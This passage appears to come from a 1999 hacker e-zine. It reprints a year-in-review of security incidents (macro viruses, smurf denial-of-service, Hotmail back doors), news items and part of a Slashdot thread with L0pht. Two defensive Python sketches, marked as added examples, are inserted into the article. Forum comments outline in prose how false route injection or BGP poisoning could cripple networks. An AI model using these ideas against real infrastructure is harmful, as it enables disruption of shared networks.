MS-Word macro virus called Melissa. 
Once loaded, it used the victim’s MAPI-standard e-mail address book to send copies of itself to the first 50 people on the list. The virus attached an infected document to an e-mail message bearing the subject line, "Important Message From ," where was that of the inadvertent sender. The e-mail message read, "Here is that document you asked for … don’t show anyone else ;-)" and included an infected MS-Word file as an attachment. The original infected document, "list.doc," was a compilation of URLs for pornographic Web sites.

3.30.99 Hot on the heels of the Melissa outbreak, a similar virus attacking MS-Excel spreadsheets appeared on the ’Net at the end of March. The so-called PaPa macro virus was more virulent than Melissa in that it sent out copies of itself to 60 names drawn from the victim’s e-mail address book, and did so every time an infected document was opened.

4.26.99 According to newswire reports, the Chernobyl computer virus struck hundreds of thousands of computers in Asia and the Middle East, with Turkey and South Korea each reporting 300,000 damaged computers.

5.28.99 Network Associates’s antivirus labs warned of a new Trojan called BackDoor-G, which was being sent around the ’Net as spam.

6.11.99 The Explore.Zip worm appeared as an attachment to e-mail masquerading as an innocuous compressed WinZip file. The executable file used the icon from WinZip to fool people into double-clicking it, at which time it began destroying files on disk.

9.02.99 Symantec announced the discovery of a dangerous MS-Word 97 macro virus called Thursday, which had a trigger date of Dec. 13. This virus was seen in the wild on about 5,000 computers in Austria, France, Germany, Ireland, Latvia, Poland, Switzerland, the U.K. and the U.S. The payload could erase all files on the victim’s C: drive.

9.20.99 A couple of new Y2K-related virus/worms were discovered in September. One e-mail Trojan, called Y2Kcount.exe, claimed that its attachment was a Y2K-countdown clock; actually, it sent user IDs and passwords out into the ’Net by e-mail. Microsoft reported finding eight different versions of the e-mail in circulation. The other Y2K virus, named W32/Fix2001, came as an attachment (ostensibly from the systems administrator) and urged victims to install the "fix" to prevent Internet problems related to the Y2K transition. Actually, the virus/worm would replicate through attachments to all outbound e-mail messages from the infected system.

11.08.99 In early November, a worrisome new worm called BubbleBoy appeared on the scene. This proof-of-concept worm was sent to Network Associates, which immediately posted a free software patch and alerted the FBI of the danger. The problem with this worm was that it would infect a host if an MS-Outlook user merely highlighted the subject line of the carrier e-mail message—no double-clicking was required. The worm’s payload was mild—changes to the registry and a simple display screen—but experts warned that the same techniques could carry much more dangerous payloads in future variations. The worm spread by mailing itself to every e-mail address on the infected system’s address list, thus posing an even greater potential danger than the Melissa virus. This attack again demonstrates the foolishness of allowing automatic execution of code by e-mail and word-processing packages.

Industrial Espionage, Infowar

1.04.99 An article in January reported on the RAND Corporation’s DoD-commissioned report, "Strategic Information Warfare Rising," issued in mid-1998. The report fueled the growing debate within the Pentagon about the wisdom of pursuing offensive information warfare capabilities. Opponents argued that widening the sphere of warfare to include cyberattacks on critical infrastructure would only increase the likelihood of successful attacks on the United States.
The report laid out four basic scenarios for future developments in infowar (IW). Daniel Verton, writing in Federal Computer Week, summarized these scenarios as follows: • U.S. supremacy in offense and defensive strategic IW. • A club of strategic IW elites, whereby a policy of no first use of strategic IW capabilities could be established. • Global "defensive dominance" in strategic IW, whereby a regime would be established to control the spread of strategic IW similar to biological and chemical weapons. • Market-based diversity, whereby the damage or disruption achievable through a strategic IW attack is modest and recovery is fast. 3.30.99 When NATO began bombing Serbia in March, Serbian hackers began a low-level campaign of harassment directed at U.S. government and military agencies. The "Black Hand" hacker group—possibly named after the notorious Sicilian secret society associated with the Mafia—and the "Serbian Angel" hackers threatened to damage NATO computers in retaliation for the war against the Serbs. On March 29, the White House Web site was defaced by red letters reading "Hackerz wuz Here." Speculation was rife that anti-NATO activists were involved. According to a Russian newspaper, unknown hackers on March 30 damaged a main NATO Web server, forcing it offline for at least a half-hour. The claim, however, was unconfirmed by NATO sources. Penetration, Phreaking, Legal Action 9.10.99 According to a report in The Wall Street Journal, the successful Y2K-compliance tests carried out in early September by the North American Electric Reliability Council (NERC) with the involvement of more than 500 utilities, electric cooperatives, power pools and power plants were marred by a criminal-hacker penetration of the Bonneville Power Administration center. The Bonneville center happened to be where Bill Richardson, the Secretary of the Department of Energy, was observing the tests. 
9.29.99 Frans De Vaere admitted breaking into the Web site of a Belgian bank in mid-August. He stole logon IDs and passwords and successfully accessed the account balances of many customers. Luckily, De Vaere was unable to effect any transactions. The bank, identified as "Generale de Banque" in a report in The Scotsman newspaper, refused to take legal action against De Vaere. However, the Skynet ISP run by the state telecom company, Belgacom, was not so accommodating. The criminal hacker broke into more than 1,000 Web sites on Skynet and stole the credit card numbers of about 20 clients. Police began an investigation, but unfortunately Belgium has no specific law addressing computer crime, and so the intruder went unpunished. Counterfeits, Forgery (Including Piracy), Shoulder Surfing 4.10.99 Jim Loney wrote a summary for Reuters about the losses due to piracy of intellectual property and counterfeiting. Some key points of Loney’s report include the following: • U.S. Customs Commissioner Bonni Tischler predicted that copyright violations and counterfeiting was "going to dwarf every type of crime in the next millennium." • U.S. companies lose an estimated $200 billion a year to product piracy involving designer clothes, shoes, handbags, software, CDs and videos. • Worldwide, software piracy costs industry $11 billion a year. • 38 percent of the 615 million new software product installations are illegal copies. • 97 percent of all the software in Vietnam is stolen. • More than 90 percent of all software in Bulgaria, China, Indonesia, Lebanon, Oman and Russia is stolen. • 60 percent of the software sold via online auctions is illegitimate. Sabotage (Excluding Web Sites) 4.14.99 In Melbourne, Australia, a 33-year-old network administrator pleaded guilty to three charges of damaging property and 30 charges of computer trespass. 
Ya Ge (Jacob) Xu admitted hacking into his former employer’s systems at Integraph Public Safety to plant a virus and to "cause trouble" when he was refused acceptable payment for unpaid overtime. Xu was fined AU$6,000, but was not sentenced to jail time. 9.29.99 A criminal hacker calling himself "Red Attack" threatened Belgian firms with electronic sabotage in a misguided attempt to draw attention to security vulnerabilities. A few weeks later, a different person claimed he was the real Red Attack, saying he would switch Belgian electrical power off for a couple of hours on Sept. 29 and break into the Belgian Prime Minister’s e-mail account. After earnest conversations with a company director of the Electrabel utility, the idiot agreed that maybe his demonstration wasn’t such a great idea after all. In the end, the threats all evaporated in yet another hoax perpetrated on gullible journalists and officials. Quality Assurance (Security Products) 8.31.99 In August, two serious security holes were demonstrated on Microsoft’s Hotmail system, which the company claims to be the biggest free Web-mail system in the world, with millions of subscribers. The problems were as follows: (1) An error in the code for entering data into a form allowed a user login without any password at all; (2) An undocumented back door allowed anyone to log in to any Hotmail account using the canonical (or possibly Canadian) password "eh." These problems meant that all unencrypted Hotmail e-mail was readable to anyone who used the exploits, and that such people could also impersonate their victims through e-mail. The holes caused Microsoft to shut down access to Hotmail for a day while the vulnerabilities were removed. Availability Issues (Not Denial-of-Service) 3.01.99 Jerry Leichter pointed out in RISKS that URLs are an unstable form of reference to scholarly work. He cited a case in which interesting papers disappeared from an academic Web site when the sponsoring research was disbanded. 
He also worried about using commercial sites as repositories for papers, arguing that the vicissitudes of the market make the destiny of such storage uncertain at best. 10.20.99 The Encyclopaedia Britannica opened its long-awaited free Web site—www.britannica.com—which immediately crashed because an order of magnitude more people tried to access the site than expected. Java, Javascript, ActiveX, Mobile Malicious Code 1.15.99 Drs. Edward Felten and Gary McGraw published a new book about mobile code security. In addition to the physical book, Securing Java: Getting Down to Business With Mobile Code, these experts put the entire text online at www.securingjava.com. The hope was that the free edition would not harm sales of the paper book. 8.03.99 Because Microsoft believes that word processing, spreadsheet and presentation software should allow automatic execution of macros—thus turning these products into programming languages—they also allowed their Internet Explorer browser to load these programs without alerting users. In August, Microsoft scrambled to issue patches to correct this design flaw so that unwary users would not be subjected to hostile code merely by downloading documents from a hostile Web site or by reading e-mail attachments. The principle still stands: Don’t double-click attachments of uncertain origin or unvalidated safety. RFI, Jamming (Not Interception) 1.29.99 In Crystal River, Fla., an innocent user unknowingly blocked all other cellular calls in his area whenever he used his new cell phone. The outages lasted 10 days while GTE tracked the problem down to his phone, which they replaced. This case illustrates the susceptibility of the highly computer-dependent cellular-phone system to disruption. 
4.16.99 Automatic garage doors in a six-mile radius of the port at Hobart, Australia, were shut down by the USS Carl Vinson’s powerful 310-320 MHz communications transmitters—which happened to override the short-range electronic communications channel allocated by the Australian regulatory bodies for such devices as garage-door openers. In addition, one poor soul was unable to move his car when the transmissions overrode his car security system, locking the vehicle down until the huge ship left.

Operating Systems, Network Operating Systems, TCP/IP Problems (Alerts)

1.12.99 Microsoft admitted that its Windows 95, Windows 98 and Windows NT operating systems contained a bug in the MSVCRT.DLL file that would delay the start of daylight savings time by a week on April 1, 2001. The April Fool’s bug would affect about 95 percent of all PCs in the world, but could be fixed by patches that were posted on the Web by Microsoft.

7.26.99 CERT/CC issued an alert on buffer overflow vulnerabilities on several UNIX systems, including Solaris and HP-UX. Using this violation of memory array restrictions, criminal hackers could plant logic bombs and back doors on victimized systems. Manufacturers scrambled to provide patches.

Denial-of-Service

1.12.99 According to an article by Tim Barlass in the Daily Telegraph of Australia, someone launched a sustained smurf denial-of-service attack on Ozemail, a popular Australian ISP. A smurf attack uses widely available software written by criminal hackers to send ping packets with forged origination in the headers to a (usually major) corporate network’s broadcast address. Every device—perhaps hundreds or thousands in all—sends a reply packet to the forged originator address. That system thus receives a flood of packets, often overloading its TCP/IP stacks and resulting in denial-of-service. The attack disrupted e-mail service for users in Sydney. A company spokesperson said Ozemail was trying to track down the perpetrator and was considering installing filtering software to prevent future attacks.

2.12.99 USA Today reported that Hotmail and Yahoo, providers of free e-mail, were improving security by shutting down any account subject to several unsuccessful attempts to log in. This is one of the oldest mistakes in systems management, since it immediately opens each account to a trivially easy denial-of-service attack: Simply try to log on several times to a victim’s account with a wrong password, and voilà, no further legitimate access is permitted until the account is reset.

Web Attacks, Vandalism

1.16.99 Daniel Tobias was startled when a colleague complained that Tobias’s Web page included a link to a pornographic Web site. Indeed, one of Tobias’s originally inoffensive links was redirected to a porn site. The problem turned out to be Web URL hijacking: The original owner of a domain either sold its domain to the pornographer or allowed the domain registration to lapse. The new domain owner programmed his Web site to point all references to the original pages at the original domain to his home page, instead of returning a "404 Not Found" message.

10.26.99 A criminal hacker or hacker group calling itself "phreak.nl" attacked U.S. Web sites in the last week of October. According to a Newsbytes article by Bob Woods, the criminals damaged Web sites of NASA’s JPL, the U.S. Army’s Redstone Arsenal’s Program Executive Office and the National Defense University. All these sites were described by a hacker-publicity group, Attrition.org, as running Windows NT servers. The defacements consisted of the usual puerile sneers and insults in the peculiar spelling affected by the criminal hacker subculture. One common theme was the notion that "phreak.nl" was engaged in "a game ... called hack the planet." In addition to these attacks, phreak.nl also damaged sites for All Timeshare, Pet GBets and WPYC.
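The smurf attack in the 1.12.99 Denial-of-Service entry above has two sides a defender can check: the amplifier network should drop pings addressed to its broadcast address, and the flooded host can recognise replies it never asked for. This sketch is an added example, not code from the article; the record layout, thresholds and addresses are constructed for illustration.

```python
"""Added example: spotting smurf-style ICMP reflection in packet records."""
import ipaddress
from collections import deque

ECHO_REQUEST, ECHO_REPLY = 8, 0   # ICMP type numbers


def is_directed_broadcast(dst, local_networks):
    """True if dst is the broadcast address of one of our IPv4 subnets.

    A border filter that drops echo requests matching this test keeps the
    network from being used as the amplifier.
    """
    addr = ipaddress.ip_address(dst)
    for cidr in local_networks:
        net = ipaddress.ip_network(cidr)
        if net.prefixlen < 31 and addr == net.broadcast_address:
            return True
    return False


def unsolicited_replies(packets, victim):
    """Yield (time, src) for echo replies the victim never requested.

    packets: iterable of (time, src, dst, icmp_type, icmp_id, seq) tuples.
    """
    outstanding = set()   # (peer, icmp_id, seq) of requests the victim sent
    for t, src, dst, icmp_type, icmp_id, seq in packets:
        if icmp_type == ECHO_REQUEST and src == victim:
            outstanding.add((dst, icmp_id, seq))
        elif icmp_type == ECHO_REPLY and dst == victim:
            key = (src, icmp_id, seq)
            if key in outstanding:
                outstanding.discard(key)      # answer to a real ping
            else:
                yield t, src                  # reflected or spoofed traffic


def detect_reflection(packets, victim, window=1.0, min_sources=5):
    """Return the first time at which at least min_sources distinct hosts
    sent unsolicited replies within `window` seconds, or None."""
    recent = deque()
    for t, src in unsolicited_replies(packets, victim):
        recent.append((t, src))
        while recent and t - recent[0][0] > window:
            recent.popleft()
        if len({s for _, s in recent}) >= min_sources:
            return t
    return None


# Constructed sample data (documentation address ranges, not real hosts).
VICTIM = "192.0.2.10"
NORMAL = [
    (1.00, VICTIM, "198.51.100.1", ECHO_REQUEST, 7, 1),
    (1.02, "198.51.100.1", VICTIM, ECHO_REPLY, 7, 1),
]
FLOOD = [(10.0 + i * 0.01, f"203.0.113.{i + 1}", VICTIM, ECHO_REPLY, 4660, 0)
         for i in range(20)]

if __name__ == "__main__":
    print("alert at t =", detect_reflection(NORMAL + FLOOD, VICTIM))
    print("amplifier check:",
          is_directed_broadcast("203.0.113.255", ["203.0.113.0/24"]))
```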
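The lockout problem in the 2.12.99 entry above can be seen by running the same sequence of logins against a hard lockout and against per-source throttling. This is an added example, not from the article or from either provider; the class names, limits and addresses are assumptions, and throttling by source is only one alternative (guessing spread over many sources needs further controls).

```python
"""Added example: account lockout compared with per-source throttling."""


class HardLockout:
    """Policy described in the text: N failures lock the account for all."""

    def __init__(self, max_failures=3):
        self.max_failures = max_failures
        self.failures = {}            # account -> consecutive failures

    def attempt(self, account, source, password_ok, now):
        if self.failures.get(account, 0) >= self.max_failures:
            return "locked"           # even the correct password is refused
        if password_ok:
            self.failures[account] = 0
            return "ok"
        self.failures[account] = self.failures.get(account, 0) + 1
        return "denied"


class SourceThrottle:
    """Alternative: exponential backoff per (account, source) pair.

    Failures from one source slow that source down but never block a
    login from a different source, so a stranger cannot lock the owner out.
    """

    def __init__(self, free_failures=3, base_delay=2.0, max_delay=900.0):
        self.free_failures = free_failures
        self.base_delay = base_delay
        self.max_delay = max_delay
        self.state = {}               # (account, source) -> (count, retry_at)

    def attempt(self, account, source, password_ok, now):
        key = (account, source)
        count, retry_at = self.state.get(key, (0, 0.0))
        if now < retry_at:
            return "throttled"        # rejected without checking the password
        if password_ok:
            self.state.pop(key, None)
            return "ok"
        count += 1
        delay = 0.0
        if count > self.free_failures:
            exponent = count - self.free_failures - 1
            delay = min(self.base_delay * 2 ** exponent, self.max_delay)
        self.state[key] = (count, now + delay)
        return "denied"


def simulate(policy):
    """Constructed scenario: one source sends ten wrong passwords, one per
    second, then the account owner logs in correctly from another source."""
    results = [policy.attempt("alice", "203.0.113.9", False, now=float(t))
               for t in range(10)]
    owner = policy.attempt("alice", "198.51.100.20", True, now=11.0)
    return results, owner


if __name__ == "__main__":
    for policy in (HardLockout(), SourceThrottle()):
        results, owner = simulate(policy)
        print(type(policy).__name__, results, "owner:", owner)
```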
Intrusion Detection Systems 7.29.99 A major row broke loose in the privacy community when the Clinton administration and the FBI announced their Federal Intrusion Detection Network (Fidnet) initiative to monitor network intrusions on not only government systems but also critical infrastructure components such as banking, communications and transport. House Majority Leader Dick Armey (R-Texas) attacked the Fidnet proposal, and the House Appropriations Committee removed funding for the project from its versions of the relevant appropriations bills. In August, one of Fidnet’s main architects spoke out in defense of the plan. Richard Clarke, National Coordinator for Security, Infrastructure Protection and Counterterrorism, explained that fears of an "electronic Pearl Harbor" (a term popularized by Winn Schwartau of infowar.com in the early 1990s) led to Presidential Decision Directive 63 and that Fidnet was one of the first major computer security programs proposed in response to the Directive. He assured skeptics of minimal involvement of the FBI, saying that Fidnet would be managed by the National Infrastructure Protection Center (NIPC), not the Department of Justice, and would not intrude on personal or corporate privacy. On Sept. 27, Rep. Armey sent another challenge to the DoJ demanding clarification of critical elements of Fidnet. Surveys, Estimates 2.23.99 The annual Australian Computer Crime and Security Survey, organized by the Victorian Computer Crime Investigation Squad and Deloitte & Touche Tohmatsu, reported on computer crimes in 350 of the largest Australian companies. In brief, the report found that about one-third of the respondents had suffered one or more attacks on their systems in 1998; of those, 80 percent had experienced insider attacks, while 60 percent had experienced outsider attacks. About 15 percent of the respondents that had experienced attacks said they had been the targets of industrial espionage. 
Almost three-quarters of all the respondents had no formal policy requiring notification of police authorities in case of attack. More than one-fifth of all respondents had experienced a breach of confidentiality; one-fifth also experienced a breach of data integrity. 4.07.99 The Fourth Annual Computer Security Institute/Federal Bureau of Investigation (CSI/FBI) Computer Crime and Security Survey demonstrated yet again that computer crime is a growing problem for U.S. companies, financial institutions and government agencies. Losses amounted to hundreds of millions of dollars, much of it resulting from industrial espionage. Among the survey’s key findings: • 26 percent of respondents reported theft of proprietary information. • System penetration by outsiders increased for the third year in a row; 30 percent of respondents reported intrusions. • Those reporting their Internet connection as a frequent point of attack rose from 37 percent of respondents in 1996 to 57 percent in 1999. • Unauthorized access by insiders rose for the third straight year; 55 percent reported incidents. • More companies—32 percent compared with 17 percent in the past three years—are reporting serious cybercrimes to law enforcement. 7.01.99 A survey of readers of this magazine confirmed that organizations conducting Internet e-commerce experience far more information security breaches than those that do not conduct e-commerce. Among other findings, the study found that companies conducting business online are 57 percent more likely to experience a leak of proprietary information, and 24 percent more likely to experience a hacking-related breach. Overall, the number of companies hit by an unauthorized access breach increased nearly 92 percent from 1998 to 1999. Average loss per company to security breaches was $256,000. 7.12.99 InformationWeek surveyed 2,700 information technology professionals in 49 countries on a variety of security-related issues. 
Among the highlights:

• 64 percent of companies fell victim to a virus attack in the past 12 months, up from 53 percent the previous year.
• In the U.S. alone, viruses hit 69 percent of companies, about four times as many as that of the next-highest category of security breach: unauthorized network entry.
• 22 percent of companies reported no security breaches at all.
• 48 percent of respondents blamed hackers for security breaches, up from 14 percent in 1998.
• 31 percent of respondents blamed contract service providers for breaches (up from 9 percent in 1998).
• 41 percent blamed authorized users and employees (down from 58 percent in 1998).

8.01.99 ICSA.net’s Fifth Annual Virus Prevalence Survey found that the likelihood of a company experiencing a computer virus more than doubled for each of the past four years. Approximately 43 percent of respondents had experienced a "virus disaster," defined as 25 or more PCs or servers infected at the same time. Slightly less than two-thirds of the latest virus disasters experienced were caused by macro viruses infecting Microsoft Word and Excel files. In 1999, more than half of the survey’s respondents encountered viruses via e-mail in their virus disasters, a significant increase over previous years.

Acceptable-Use Policies, Spam Wars (Corporate)

6.14.99 GartnerGroup surveyed 13,000 e-mail users around the world about their experiences with spam. The results were alarming:

• 90 percent of the respondents received at least one junk e-mail per week.
• 96 percent of those online for four years or more received junk e-mail at least once a week.
• 33 percent got between six and 10 junk messages a week.
• ISPs lose approximately 7 percent of their new users every year because of disgust with spam.
• 40 percent of the respondents agreed that spam should be banned.
• 25 percent said that spam should be regulated.
• 3 percent of the respondents enjoyed it to some extent.
Crypto Algorithm Weakness, Brute-Force Attacks

1.19.99 Under the direction of John Gilmore, a team from the Electronic Frontier Foundation (EFF) and Distributed.net cracked RSA Data Security’s DES Challenge III in 22 hours, winning a grand prize of $10,000. The decryption was a demonstration of the weakness of the DES and a blow against the U.S. government’s restrictions on the export of strong encryption products.

8.16.99 Adi Shamir (the "S" in RSA) of the Weizmann Institute of Science in Rehovot, Israel, announced a successful brute-force attack on a 512-bit RSA private key; the cryptanalysis took seven months and required 292 computers at 11 different sites. However, Shamir also described the theoretical design for a $2 million cryptanalytic computer called "TWINKLE" that could apply brute-force attacks successfully to RSA keys of 512 bits or less in less than a week.

New I&A Products (Tokens, Biometrics, Passwords)

1.01.99 Scientists in Britain established the uniqueness of ear-cartilage patterns and successfully prosecuted a burglar who put his ear to a window to detect sounds in the home he burgled. The thief murdered a 94-year-old woman and was consequently sent to prison for life. The police authorities had gathered 1,200 ear prints from volunteers by the end of 1998 and were hoping to begin collecting ear prints from suspects.

Cryptography Exports From the U.S.

9.16.99 President Clinton issued a public letter addressed to Congress that pushed for passage of the Cyberspace Electronic Security Act of 1999 (CESA), which simultaneously deregulates most encryption software exports and provides for key escrow accessible to law enforcement agencies under warrant.

Key Escrow/Recovery Laws

4.09.99 Andrew Fernandes of Cryptonym, a Canadian security firm, seems to have gone off half-cocked when he found a signing key for integrating cryptographic modules into Windows that was labeled "NSAKey."
He and other conspiracy buffs interpreted this label to mean that there was somehow a back door into Windows that would allow the National Security Agency to integrate its own cryptographic modules into the operating system, yet have the version check out using digital signature verification. Such manipulations could generate versions of Windows with a back door for the NSA. Microsoft denied this interpretation and claimed that the key was "compliant with the NSA’s technical standards." A particularly clear discussion by Russ Cooper on NTBugtraq pointed out that the conspiracy theory was farfetched, but warned that it would indeed be possible for anyone to insert their own cryptographic modules into Windows and sign them using their own digital key. This would allow foreign crypto to run under Windows even without signature by Microsoft or approval by the U.S. Department of Commerce under the Export Administration Regulations (EARs). Privacy, Privacy Legislation 4.16.99 Kevin Cooke, development manager at Wired magazine, discovered that Microsoft’s Internet Explorer version 5.0 sends information to a Web site when the user bookmarks the site’s URL. In an interview with Chris Oakes of Wired, Microsoft product manager Mike Nichols said, "This is one of those things where we did not see the privacy issue when we were creating the feature. The feature doesn’t pose a super-huge risk. But Microsoft is looking at ways of modifying this feature in future releases." Apparently, the feature was designed to allow a Web site to supply an icon to be stored on the user’s system so any "Favorite" would be "branded" with that icon. 11.03.99 RealNetworks admitted that it had been collecting information about exactly what users of its RealJukebox player were listening to. The company did not inform users of the monitoring, and got hammered by its competitors, privacy advocates and many users. 
The company immediately changed its public privacy statement to let people know about the data collection function, and its spokesperson swore that the data had been aggregated so that no one could trace the specific interests of any one user. The company immediately apologized to the public for the concerns it had caused, and provided a patch to disable detailed reporting.

Review in Review

While this article gives you a glimpse of some of the significant developments in the field of infosecurity in 1999, there is no way to include an excerpt from each category of the full report. However, the full Infosec Year-in-Review database (see www.icsa.net) classifies hundreds of cases and issues spanning the field of information security. I encourage you to download the full PDF file in early 2000 for further review and discussion of the events of 1999.

M. E. Kabay, Ph.D., CISSP (mkabay@icsa.net), is director of education for ICSA Labs.

Footnotes:

These malicious programs are called "virus/worms" because they integrate into the operating system (i.e., they are virus-like), but also replicate through networks via e-mail (i.e., they are worm-like).

See Bruce Schneier's Crypto Year-In-Review column for further discussion of 1999 cryptography events.

@HWA

21.0 Butchered From Inside 7 12/27/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by del0rean

Butchered From Inside is an electronic publication of free speech and distribution. Issue #7 has just been released and it includes articles on spoofing, CCC Camp review, Gork, and WinnAMP. Sorry, it is in Italian only.
Butchered From Inside http://www.s0ftpj.org/bfi

@HWA

22.0 DVD Industry Sues over 500 Defendants in Anti-Piracy Lawsuit 12/28/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Mazzic and Macki

The DVD Copy Control Association, Inc., (DVD CCA) a non-profit trade association, has named 21 defendants and 500 John Does in a lawsuit filed in Santa Clara County Superior Court. The lawsuit alleges that the defendants misappropriated 'trade secrets' and 'proprietary information' and distributed the information via their web sites. The defendants, by posting DeCSS software, caused the illegal pirating of the motion picture industry's copyrighted content contained on DVDs. E-mail from the California law firm Weil, Gotshal & Manges, LLP notified the defendants late yesterday afternoon that they are seeking a restraining order from the court.

DeCSS was independently developed in Norway earlier this year. The software allows the playing and copying of DVD movies on Linux computer systems. Apparently the mirroring of the DeCSS software was enough to turn ordinary people into criminals who want to destroy the entire motion picture industry and ruin all that is good in the world. (I would really like to know how a county court can process an injunction that is valid in 12 states and eleven countries?)

HNN's copy of the legal complaint
http://www.hackernews.com/special/1999/dvdinjunction.html

2600.com - One of the defendants
http://www.2600.com/news/1999/1227.html

DeCSS Defense Site
http://www.lemuria.org/DeCSS/

DVD Copy Control Association
http://www.dvdcca.org/dvdcca/index.html

@HWA

23.0 Web Based CGI Vulnerability Scanner Released 12/28/99
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by webmaster

Check your web site (or anyone else's) for 64 known CGI vulnerabilities in seconds.
If you have new vulnerabilities not included in the scanner you can submit them here mailto:webmaster@digital-harmony.com

Web Based CGI Scanner
http://www.nobullshit.org/

@HWA

24.0 L0pht Interviewed by Slashdot
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Joey

L0pht Heavy Industries, the premier hacker think tank, has been honored by Slashdot as the next victim in their community interview process. So far many of the proposed questions are very interesting and should elicit some great responses. Add your voice to the fray.

Slashdot.org
http://slashdot.org/article.pl?sid=99/12/27/1015213&mode=thread

I've reproduced the 'interview' here but the format is a real mess and I'd have to spend hours editing it, so just follow along best you can or go to the link; it should lead you to the archived version on Slashdot. Here it is unformatted. - Ed

This discussion has been archived. No new comments can be posted.

Shutting down the Internet (Score:3, Interesting)
by papo (papo@uninet.com.br) on Monday December 27, @12:04PM EST (#1)
You said in an interview that it's possible to shut down all the Internet. How might you possibly do that? With a DoS attack in some routers or by taking command of some servers in the principal backbones of the USA?
"Learning, learning, learning - that is the secret of jewish survival" -- Ahad A'Ham

Re:Shutting down the Internet (Score:1)
by merky1 on Monday December 27, @12:07PM EST (#5)
If I can add to this.. What event would cause you to take down the internet?
--WooooHoooo--

Re:Shutting down the Internet (Score:3, Informative)
by jd on Monday December 27, @12:16PM EST (#20)
That one's easy. Very few routers have authoritative checks set up. Simply fire up a router such as gated and have it inject false routes into the net. Have the backbone located at the South Pole, for instance. The UK network's been crashed dozens of times, by this.
Usually by poor network administration, or faulty software, but that's just details. What an admin can do through ignorance, I'm sure crackers could do by design.

Re:Shutting down the Internet (Score:0)
by Anonymous Coward on Monday December 27, @02:29PM EST (#111)
hmm... something about poisoning BGP tables?

Re:Shutting down the Internet & a question 2 L0pht (Score:1)
by EchoMirage on Monday December 27, @03:55PM EST (#136)
Many/most people that laughed at this claim forget that computer networks operate almost identically to power grids. By taking out all the Cisco routers, for instance, you might only take 30%-50% of the networks, but as other networks attempt to fail over and become dependent on the still live networks, those networks, routers, and servers become overloaded with the traffic and start to fail. It's a domino effect. This is the reason when someone with a backhoe cuts a major cross-continental fibre line, the rest of the Internet, especially in nearby affected areas, slows to a crawl because other networks failing over to another backbone creates a strain on those lines and equipment. Now, for my question to L0pht: What, in terms of network design, do you see as the single biggest threat to security?

Re:Shutting down the Internet & a question 2 L0pht (Score:0)
by Anonymous Coward on Tuesday December 28, @08:42PM EST (#222)
the lack of attention to detail.

Re:Shutting down the Internet (Score:0)
by Anonymous Coward on Monday December 27, @01:38PM EST (#82)
I think there is a better question. First, the claim is a bit of a braggadocio, it's easy to talk and the statement is pretty vague to begin with. That is sort of the nature of cracking community. I'm not going to say that it's not possible, corrupting router tables is a very good place to start and there are probably a few computing centers where a good DoS attack could seriously hamper internet traffic but those aren't really crashing things and they usually don't last that long.
There is a huge difference between cutting down the performance and making lots of traffic go through smaller pipes and crashing or stopping the net, the bigger it becomes the more reliable it becomes. As more and more infrastructure becomes dependent on the net, the net becomes more and more connected and more and more security is placed on more important pieces. Companies like AOL, TCI/ATandT, Qwest, mindspring, Amazon, etc... have substantial financial incentive to protect the net, secure their servers and network infrastructure, and have staff on duty ready to catch and fix problems as soon as they happen. 15 years ago, you could have easily attacked one router and substantially crippled the net, you could have gone after 5 or 10 and pretty much shut it down. It is so much more connected today than it was then, you can cut a couple of major channels and there are others that stay up. There is no longer one east-west network pipe, there are numerous pipes and it keeps getting more and more connected. Take that major power-outage that cut power to most of the western US and parts of Canada a couple years back, the internet didn't blink. If you do believe that you can crash it, how much longer do you think it will stay that way? Or do you even think that it is progressing towards a much more stable and crash-resistant infrastructure, please explain. Then on the ethics side (sorry to over shoot the one q per post rule) if you do believe you can do it, what have you done to get the problems fixed or at least publicize the methods so they can be corrected for? I would think that it would be good for business to take credit for stopping a potentially huge network shutdown.

Re:Shutting down the Internet (Score:0)
by Anonymous Coward on Tuesday December 28, @08:50PM EST (#223)
I have experienced the provider's, "...substantial financial incentive to protect the net, secure their servers and network infrastructure..." And I don't like it, at all.
I had one of the listed providers with a misconfigured (or 0wned) that was allowing source routed packets to my machines. The, "...staff on duty ready to catch and fix problems as soon as they happen...", was quite willing to disable source routing, after I informed them of the invalid packets. I think the main lesson here is: When you assume, it makes an ASS out of U and ME.

Re:Shutting down the Internet (Score:0)
by Anonymous Coward on Monday December 27, @01:38PM EST (#84)
Read this comment.

Re:Shutting down the Internet (Score:1)
by batz (batz@vapour.net) on Tuesday December 28, @06:11PM EST (#221) http://www.vapour.net
Apologies for the flagrant plug, but this was covered in depth at Blackhat '99 in Las Vegas. All the presentations are online, including mine, which detailed problems with the way that BGP is designed, implemented and configured. It's all available at www.blackhat.com They made this claim almost 2 years ago. I wouldn't speak for them, but it's kinda like asking yelling "Ziggy!" at a David Bowie concert.
-- batz Chief Reverse Engineer Superficial Intelligence Research Division Defective Technologies

Y2k Hacking (Score:3, Interesting)
by merky1 on Monday December 27, @12:04PM EST (#2)
Do you agree with the President's plea to cease hacking activities for Y2K, and do you think it will have an adverse effect? "Those [filthy|pagan|heathen|whiny] americans, I'll show them....."
--WooooHoooo--

Job offers (Score:1)
by eyeball on Monday December 27, @12:07PM EST (#6) http://www.spacehaven.com
Whenever the subject of securing our web servers comes up at work, someone inadvertently says "We should hire one of those L0pht guys." As if you have nothing better to do than to work for a starving second-rate e-commerce IPO. My question is: Do you get job offers like this? If so, how does it feel? Do you refer them somewhere?
I'm looking for Sara Shelton from the Oregon/Washington area. Please email me if you know her.

Re:Job offers (Score:0)
by Anonymous Coward on Monday December 27, @12:59PM EST (#54)
